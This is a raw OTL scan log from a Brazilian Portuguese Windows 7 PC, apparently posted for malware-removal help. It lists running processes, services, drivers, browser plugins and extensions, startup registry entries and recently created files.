2,00 Gb Total Physical Memory | 0,99 Gb Available Physical Memory | 49,39% Memory free

4,00 Gb Paging File | 2,65 Gb Available in Paging File | 66,41% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 232,73 Gb Total Space | 101,97 Gb Free Space | 43,82% Space Free | Partition Type: NTFS

Computer Name: 2011_PC | User Name: 2011 | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: Current user

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

PRC - [2013/11/08 22:36:33 | 003,568,312 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastUI.exe

PRC - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe

PRC - [2012/11/23 00:48:41 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe

PRC - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) -- C:\Arquivos de Programas\Software Plate\svcgdp.exe

PRC - [2011/02/25 03:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe

PRC - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe

PRC - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Modules (No Company Name) ==========

MOD - [2013/12/04 00:48:04 | 000,399,312 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll

MOD - [2013/12/04 00:48:03 | 013,586,896 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\PepperFlash\pepflashplayer.dll

MOD - [2013/12/04 00:48:02 | 004,055,504 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\pdf.dll

MOD - [2013/12/04 00:47:11 | 000,702,416 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\libglesv2.dll

MOD - [2013/12/04 00:47:11 | 000,099,792 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\libegl.dll

MOD - [2013/12/04 00:47:08 | 001,619,408 | ---- | M] () -- C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\ffmpegsumo.dll

MOD - [2013/10/21 14:12:35 | 019,336,120 | ---- | M] () -- C:\Arquivos de Programas\AVAST Software\Avast\libcef.dll

MOD - [2011/03/17 00:11:16 | 004,297,568 | ---- | M] () -- C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

MOD - [2010/10/20 15:45:26 | 008,801,120 | ---- | M] () -- C:\Arquivos de Programas\Microsoft Office\Office14\1033\GrooveIntlResource.dll

MOD - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Services (SafeList) ==========

SRV - [2013/12/05 01:14:53 | 000,108,032 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\IEEtwCollector.exe -- (IEEtwCollectorService)

SRV - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)

SRV - [2013/10/09 00:56:37 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2013/10/05 22:41:26 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)

SRV - [2013/06/21 11:57:12 | 000,162,408 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Arquivos de Programas\Skype\Updater\Updater.exe -- (SkypeUpdate)

SRV - [2013/05/27 02:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Windows Defender\MpSvc.dll -- (WinDefend)

SRV - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) [Auto | Running] -- C:\Arquivos de Programas\Software Plate\svcgdp.exe -- (svcgdp)

SRV - [2010/12/27 23:50:30 | 031,124,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)

SRV - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)

SRV - [2010/01/09 21:37:50 | 004,640,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)

SRV - [2010/01/09 21:18:00 | 000,149,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\Source Engine\OSE.EXE -- (ose)

SRV - [2009/07/13 23:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)

SRV - [2009/07/13 23:16:12 | 001,004,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\PeerDistSvc.dll -- (PeerDistSvc)

SRV - [2003/04/18 20:06:26 | 000,008,192 | ---- | M] () [Disabled | Stopped] -- C:\Windows\System32\srvany.exe -- (KMService)

========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\rdvgkmd.sys -- (VGPU)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\drivers\tsusbhub.sys -- (tsusbhub)

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\synth3dvsc.sys -- (Synth3dVsc)

DRV - [2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswsp.sys -- (aswSP)

DRV - [2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswTdi.sys -- (aswTdi)

DRV - [2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswSnx.sys -- (aswSnx)

DRV - [2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt)

DRV - [2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk)

DRV - [2013/10/21 14:12:37 | 000,178,304 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswVmm.sys -- (aswVmm)

DRV - [2013/10/21 14:12:37 | 000,079,720 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr2.sys -- (aswRdr)

DRV - [2013/10/21 14:12:37 | 000,049,944 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswRvrt.sys -- (aswRvrt)

DRV - [2012/09/15 16:59:31 | 000,242,240 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01)

DRV - [2012/08/23 12:44:32 | 000,014,848 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)

DRV - [2012/08/23 12:40:25 | 000,049,664 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\TsUsbFlt.sys -- (TsUsbFlt)

DRV - [2010/11/20 10:30:15 | 000,175,360 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmbus.sys -- (vmbus)

DRV - [2010/11/20 10:30:15 | 000,040,704 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmstorfl.sys -- (storflt)

DRV - [2010/11/20 10:30:15 | 000,028,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\storvsc.sys -- (storvsc)

DRV - [2010/11/20 07:59:44 | 000,035,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb)

DRV - [2010/11/20 07:14:45 | 000,017,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VMBusHID.sys -- (VMBusHID)

DRV - [2010/11/20 07:14:41 | 000,005,632 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vms3cap.sys -- (s3cap)

DRV - [2009/07/13 21:45:33 | 000,083,456 | ---- | M] (Brother Industries Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\serial.sys -- (Serial)

DRV - [2009/07/13 20:09:17 | 004,194,816 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag)

DRV - [2009/07/13 20:02:50 | 000,211,456 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\e1e6032.sys -- (e1express)

DRV - [2005/02/11 11:19:20 | 000,055,216 | ---- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\k750bus.sys -- (k750bus)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.google.com

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com

IE - HKLM\..\SearchScopes,DefaultScope =

IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://br.msn.com/?ocid=iehp

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = pt-br

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 93 66 3B FF A9 7E CC 01 [binary data]

IE - HKCU\..\SearchScopes,DefaultScope = {DB9BCD20-54F3-4A60-9865-B07BC3E63560}

IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKCU\..\SearchScopes\{DB9BCD20-54F3-4A60-9865-B07BC3E63560}: "URL" = http://www.google.com/search?hl=en&q={searchTerms}&rlz=1I7GGNI_pt-BRBR507

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========

FF - prefs.js..browser.search.selectedEngine: "Google"

FF - prefs.js..browser.search.useDBForOrder: true

FF - prefs.js..network.proxy.autoconfig_url: ""

FF - prefs.js..network.proxy.http: ""

FF - prefs.js..network.proxy.type: 2

FF - user.js - File not found

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll ()

FF - HKLM\Software\MozillaPlugins\@foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf: C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\2011\AppData\Local\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\2011\AppData\Local\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\daplinkchecker@speedbit.com: C:\Program Files\DAP\daplinkchecker [2013/02/10 01:00:56 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{F17C1572-C9EC-4e5c-A542-D05CBB5C5A08}: C:\Program Files\DAP\DAPFireFox [2013/02/10 01:00:55 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

[2012/10/05 20:47:52 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Extensions

[2013/11/23 15:59:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions

[2013/10/06 10:06:43 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}

[2013/11/23 15:59:57 | 000,382,345 | ---- | M] () (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\firefox\profiles\1t2pwtzw.default\extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi

[2013/10/05 22:41:09 | 000,000,000 | ---D | M] (No name found) -- C:\Arquivos de Programas\Mozilla Firefox\extensions

[2013/10/05 22:41:28 | 000,263,064 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll

[2013/10/05 22:41:22 | 000,001,240 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\buscape.xml

[2013/10/05 22:41:22 | 000,001,425 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\mercadolivre.xml

[2013/10/05 22:41:22 | 000,002,086 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

[2013/10/05 22:41:22 | 000,001,381 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-br.xml

[2013/10/05 22:41:22 | 000,001,165 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-br.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)

CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}

CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},

CHR - homepage: http://www.google.com

CHR - plugin: Widevine Content Decryption Module (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.1.376\_platform_specific\win_x86\widevinecdmadapter.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\PepperFlash\pepflashplayer.dll

CHR - plugin: Chrome Remote Desktop Viewer (Disabled) = internal-remoting-viewer

CHR - plugin: Native Client (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll

CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.63\pdf.dll

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL

CHR - plugin: Foxit Reader Plugin for Mozilla (Disabled) = C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll

CHR - plugin: Java Deployment Toolkit 7.0.450.18 (Enabled) = C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll

CHR - plugin: Java Platform SE 7 U45 (Enabled) = C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll

CHR - plugin: Google Update (Enabled) = C:\Users\2011\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll

CHR - Extension: YouTube Center = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcegdpionpopahcglnfiiioapcclamdj\2.0.1_0\

CHR - Extension: James White = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm\3_0\

CHR - Extension: DAP Link Checker = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bodfdknjhecmadheclfjkhhiofeagdbh\1.0.1.8_0\

CHR - Extension: Download Accelerator Plus (DAP) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffdcfjdljhbehggjdkdioajnknjcpbjb\2.0.11_0\

CHR - Extension: Windows Media Player Extension for HTML5 = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak\1.0_0\

CHR - Extension: Google Wallet = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\

O1 HOSTS File: ([2013/12/05 18:20:00 | 000,000,822 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts

O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O2 - BHO: (Java Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Arquivos de Programas\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Arquivos de Programas\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

O2 - BHO: (SpeedBit Link Verification Helper) - {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - C:\Arquivos de Programas\DAP\LinkVerifier.dll (Speedbit Ltd.)

O2 - BHO: (Java Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Arquivos de Programas\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O4 - HKLM..\Run: [20131121] C:\Program Files\AVAST Software\Avast\setup\emupdate\2b520615-d68a-4492-a5e4-39b59408a272.exe (AVAST Software)

O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)

O4 - HKCU..\Run: [F.lux] C:\Users\2011\Local Settings\Apps\F.lux\flux.exe ()

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3

O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O8 - Extra context menu item: &Download with &DAP - C:\Arquivos de Programas\DAP\dapextie.htm ()

O8 - Extra context menu item: &Verify with DAP - C:\Arquivos de Programas\DAP\dapverify.htm ()

O8 - Extra context menu item: Download &all with DAP - C:\Arquivos de Programas\DAP\dapextie2.htm ()

O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: Sothink Flash Downloader For IE - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra Button: Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra 'Tools' menuitem : Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O13 - gopher Prefix: missing

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 1.6.0_30)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A2789148-CF95-4F73-990F-5895C4E94439}: DhcpNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Arquivos de Programas\Common Files\microsoft shared\Help\hxds.dll (Microsoft Corporation)

O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Arquivos de Programas\Common Files\Skype\Skype4COM.dll (Skype Technologies)

O18 - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)

O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)

O20 - HKCU Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2009/06/10 19:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]

O34 - HKLM BootExecute: (autocheck autochk *)

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

========== Files/Folders - Created Within 30 Days ==========

[2013/12/05 18:18:31 | 000,000,000 | ---D | C] -- C:\LinhaDefensiva

[2013/12/05 18:17:11 | 000,178,597 | ---- | C] (Igor Pavlov) -- C:\Users\2011\Desktop\bankerfix.exe

[2013/12/05 01:14:53 | 004,240,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9.dll

[2013/12/05 01:14:53 | 002,724,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb

[2013/12/05 01:14:53 | 001,926,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\inetcpl.cpl

[2013/12/05 01:14:53 | 001,051,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtmlmedia.dll

[2013/12/05 01:14:53 | 000,703,488 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieapfltr.dll

[2013/12/05 01:14:53 | 000,646,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\MsSpellCheckingFacility.exe

[2013/12/05 01:14:53 | 000,645,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jsIntl.dll

[2013/12/05 01:14:53 | 000,616,104 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieapfltr.dat

[2013/12/05 01:14:53 | 000,553,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9diag.dll

[2013/12/05 01:14:53 | 000,523,776 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeeds.dll

[2013/12/05 01:14:53 | 000,440,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieui.dll

[2013/12/05 01:14:53 | 000,367,104 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\dxtmsft.dll

[2013/12/05 01:14:53 | 000,337,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\html.iec

[2013/12/05 01:14:53 | 000,244,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\dxtrans.dll

[2013/12/05 01:14:53 | 000,238,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iedkcs32.dll

[2013/12/05 01:14:53 | 000,233,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\url.dll

[2013/12/05 01:14:53 | 000,208,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ie4uinit.exe

[2013/12/05 01:14:53 | 000,194,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\elshyph.dll

[2013/12/05 01:14:53 | 000,182,272 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msls31.dll

[2013/12/05 01:14:53 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msrating.dll

[2013/12/05 01:14:53 | 000,151,552 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iexpress.exe

[2013/12/05 01:14:53 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\wextract.exe

[2013/12/05 01:14:53 | 000,116,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iepeers.dll

[2013/12/05 01:14:53 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieUnatt.exe

